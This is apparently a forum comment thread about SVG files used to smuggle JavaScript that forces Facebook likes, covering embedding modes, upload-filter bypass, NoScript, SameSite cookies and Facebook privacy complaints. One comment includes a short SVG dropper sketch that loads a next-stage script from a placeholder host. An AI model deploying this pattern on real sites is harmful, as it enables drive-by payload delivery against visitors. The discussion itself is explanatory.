That led to the weird situation where browsers have two ways of embedding an SVG into a web page: embed it in an <img> tag and the JavaScript won't run, but embed it in an <iframe> and it will (though of course an iframe's height can't auto-size...)
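A minimal sketch of the three embedding modes (picture.svg is a placeholder filename):

```html
<!-- Scripts inside the SVG do NOT run; it's rendered as a static image: -->
<img src="picture.svg" alt="static render only">

<!-- Scripts inside the SVG DO run, in a separate browsing context: -->
<iframe src="picture.svg"></iframe>

<!-- Inlined SVG: any scripts would run with the host page's own origin: -->
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40"/>
</svg>
```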
The JavaScript also means pretty much no user-generated-content site allows the upload of SVGs. Wikipedia is the only place I can think of, and even they serve the SVG as a PNG almost everywhere.
For this to work, the SVG has to be loaded in an iframe or in a new tab. Or it could be inlined in the HTML.
Nothing special about SVG really, as long as you (Facebook) treat SVG files as images and don't inline them.
The SVG part only really comes in as a way to hide script tags from anyone looking at the network requests, but even then it seems that the specific SVG was crafted to download further scripts.
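For reference, that's easy because SVG is an XML document and supports a <script> element much like HTML does. A minimal sketch of such a dropper (the URL is a placeholder, not the actual payload from the article):

```xml
<svg xmlns="http://www.w3.org/2000/svg">
  <script><![CDATA[
    // Runs when the SVG is opened directly or in an iframe (not via <img>).
    // A dropper like the one described would then pull in further code:
    var s = document.createElementNS("http://www.w3.org/2000/svg", "script");
    s.setAttribute("href", "https://example.com/next-stage.js"); // placeholder URL
    document.documentElement.appendChild(s);
  ]]></script>
</svg>
```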
So what's the issue here exactly? It seems that Facebook is still somehow affected by XSS? Neat.
[1] https://www.malwarebytes.com/blog/news/2025/08/adult-sites-t...
- the OS previews it as an image, but on click it opens a website (which to be fair, once you click on a downloaded file, you're already done)
- SVGs are allowed in any "image/*" form, bypassing certain filters
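That second bypass is easy to reproduce with a naive upload filter. A hypothetical sketch (isAllowedImage is a made-up function name for illustration):

```javascript
// Naive filter: accepts any MIME type under "image/*".
// This is exactly the check that lets scriptable SVGs through.
function isAllowedImage(contentType) {
  return contentType.startsWith("image/");
}

console.log(isAllowedImage("image/png"));     // true
console.log(isAllowedImage("image/svg+xml")); // true: scriptable SVG slips through
console.log(isAllowedImage("text/html"));     // false
```

A safer filter allowlists specific raster types instead of matching the whole image/* prefix.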
It's a bit annoying the first few days, but then the usual sites you frequent will all be whitelisted and all that's left are random sites you come across infrequently.
NoScript is just too painful for people who want to just browse the web. It's the Gentoo of browser extensions. People with massive time and patience can do it, yes, but the rest of us are best served by uBlock and standard browser protections.
They do, but as a long-time NoScript user I can tell you from personal experience that this content rarely does anything important, and leaving it out often improves your UX. Problems like you describe pop up... from time to time, for individual sites, maybe a few times a year, and definitely not on "regular sites".
And excluding that content almost invariably improves the page.
No, not really. Usually just the top-level domain is enough. Very occasionally a site will have some other domain they serve from, and it's usually obvious which one to allowlist. It takes like, ten seconds, and you only need to do it once per domain if you make the allowlisting permanent. If you get really impatient, you can just allow all scripts for that tab and you're done.
It is some extra work, and I won't disagree if you think it's too much, but you're really overselling how much extra work it is.
I was already convinced, you don't need to keep selling it ;)
This ought to be the default in every common web browser, just as you should have to look at the data sharing "partners" and decide whether they're benign enough for your taste.
How does this work in reality? Do you just whitelist every site you come across if it's broken? What's the security advantage here? Or do you bail if it requires javascript? What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
I look at the breakage, consider how the site was promoted to me, and make a decision.
> What's the security advantage here?
Most of the bad stuff comes from third parties and doesn't provide essential functionality. A whitelist means you're unblocking one domain at a time, starting with the first party. If there's still an issue, it's usually clear what needs unblocking (e.g. a popular CDN, or one with a name that matches the primary domain) and what's a junk ad server or third-party tracking etc. You can even selectively enable various Google domains for example so that GMail still works but various third-party Google annoyances are suppressed.
> What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Depends on trust levels of course, but there's at least some investigation that can be done to see that it actually is coming from Anubis or Cloudflare.
>Do you just whitelist every site you come across if it's broken?
Mostly, yes, often temporarily for that session, unless I do not trust a website, then I leave. How I deem what is trustworthy or not is just based on my own browsing experience I guess.
>What's the security advantage here?
You can block scripts, frames, media, webgl... Meaning no ads, no JS... Which helps minimize the more common ways to spread malware, or certain dark patterns, as well as just making browsing certain sites more pleasant without all the annoying stuff around.
>Or do you bail if it requires javascript?
If I don't trust a website, yes.
>What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Not all sites require JS to work, and when they do, they don't require every single JS domain on the page. An example of this would be many of the popular news sites, which sometimes try to load JS from 10 or more domains but only really require one, or none, to be usable. Take CNN: I don't need to whitelist its main domain via NoScript to read articles or navigate, but the moment I whitelist CNN.com, I see a flood of other domains to whitelist which are definitely not needed, like CNN.io, cookielaw.org, optimizely.com, etc...
Take Hacker News. It's viable without JS, I can read, navigate and comment, but if I want to use the search function, I need to whitelist algolia.com (which powers the search) or else I just see "This page will only work with JavaScript enabled". The search function not working is the most common issue you'll find if you block all JS by default.
It depends, but frequently, yes. E.g. if I'm about to read a tech blog and see it's from someone who can't make a couple of paragraphs work without scripting, that raises the odds that whatever they had to say wasn't going to be valuable, since they evidently don't know the basics.
It's the frontend version of people writing about distributed clusters to handle a load that a single minipc could comfortably handle.
I do. If a site just doesn't work without JS, it's not likely to be a site that is valuable to me so nothing is lost.
Most websites load their required scripts from their own domain. So you allowlist the domain you are visiting, and things just work. However, many websites also load JS from like 20 other domains for crap like tracking, ads, 3rd party logins, showing cookie popups, autoplaying videos, blah blah blah. Those stay blocked.
Try it out: Visit your local news website, open your uBlock Origin panel, and take a look at all the domains in the left half. There will probably be dozens of domains it's loading JS from. 90% of the time, the only one you actually need is the top one. The rest is 3rd party crap you can leave disabled.
And yeah, if a website doesn't work after allowlisting two or three domains, I usually just give up and leave. Tons of 3rd party JS is a strong indicator that the website is trying to show you ads or exploit you, so it's a good signal that it's not worth your time.
The challenge is sites like StackOverflow which don't completely break, but have annoying formatting issues. Fortunately, uBlock lets you block specific elements easily with a few clicks, and I think you can even sync it to your phone.
Even if other users do indeed whitelist everything needed in order to make sites work, they will still end up with many/most of the third-party scripts blocked.
But does not fix the CSRF vulnerability, apparently.
In a world where same-site cookies are the default you have to actively opt-in to this sort of thing.
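For the record, this is the knob in question: modern browsers treat cookies without a SameSite attribute roughly as Lax, so a site has to opt in explicitly to have its cookies ride along on cross-site requests (header sketch; the cookie name and value are placeholders):

```
Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Lax
    (cookie withheld on cross-site POSTs and subresource requests)

Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=None
    (explicit opt-in: cookie is sent on cross-site requests; must also be Secure)
```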
Facebook might not care, but it is obviously a vulnerability. Sites can forge likes from users (which IIRC appear on timelines?).
It would be nice if we had one of those, but SVG is not it, at least not unless you’re willing to gloss HTML as “an open format for rendering reflowable text”. SVG is a full platform for web applications with fixed-layout graphics and rich animations, essentially Flash with worse development tools.
There have been some attempts to define a subset of SVG that represents a picture, like SVG Tiny, but that feels about as likely to succeed as defining JSON by cutting things out of JavaScript. (I mean, it kind of worked for making EPUB from HTML+CSS... If you disregard all the insane feature variation across e-readers that is.) Meanwhile, other vector graphics formats are either ancient and not very common (CGM, EPS, WMF/EMF) or exotic and very not common (HVIF, IconVG, TinyVG).
(My personal benchmark for an actual vector format would be: does it allow the renderer to avoid knowing the peculiarities of Arabic, Burmese, Devanagari, or Mongolian?)
The best thing about flash was that it let non-coders create interactive things. The editor with a timeline + code you could stick to objects was the best feature.
I had to learn to code properly after flash died, which probably was a good thing, but I still miss that way of making things.
Also the dates don't work. HTTP/1.1 with gzip/compress/deflate encodings was live in browsers and servers with inline compression well before the standard was published as RFC 2068 in 1997. SVG's spec was four years behind that, and IIRC adoption was pretty glacial as far as completeness and compliance go.
The linked article just regurgitates the source.
If you want real isolation, use browser profiles.
Yes! And that container is in a Firefox instance, accessed as a remote app (I'm here right now, but in a different container).
Why are they clicking like buttons instead of stealing money from bank accounts then?
I think I'm missing something; if you can embed arbitrary JavaScript in the SVG, why is a click necessary to make that JavaScript run? And if JavaScript on your page can exploit CSRF on Facebook, why is embedding it in an SVG necessary?
A human clicking something on the site tends to get around bot detection and similar systems put in place to prevent automation. This is a basic “get the user to take an action they don’t know the outcome of” attack.
E.g. you can't enable sound on a webpage without a real click.
Running JS inside an image format sounds like a thing they could add permissions for (or a click-to-play overlay), especially if it can talk to other sites.
Wouldn't that be discovered pretty quickly, when Bob's family and friends see porn promoted to them because Bob apparently liked it on Facebook? Eventually, one of them would mention it to him.
"Y'know, Bob, you probably don't want to be liking that on your main Facebook account... Are you feeling OK?"
I see what you did there ;)
If you are a woman, did you know Facebook has been stealing menstruation data from apps and using it to target ads to you?
If you take photos with your smartphone, did you know Meta has been using them to train their AI? Even if you haven't published them on Facebook?
To say nothing of Facebook's complicity in dividing cultures and fomenting violence and hate...
Facebook Marketplace supplanted a number of earlier sites - like Hotpads for rentals and Craigslist for cars.
In mid 2021 there were hundreds of applicants per rental listing, even on Marketplace. No one had the luxury of a listing-site preference.
Well there's your problem right there.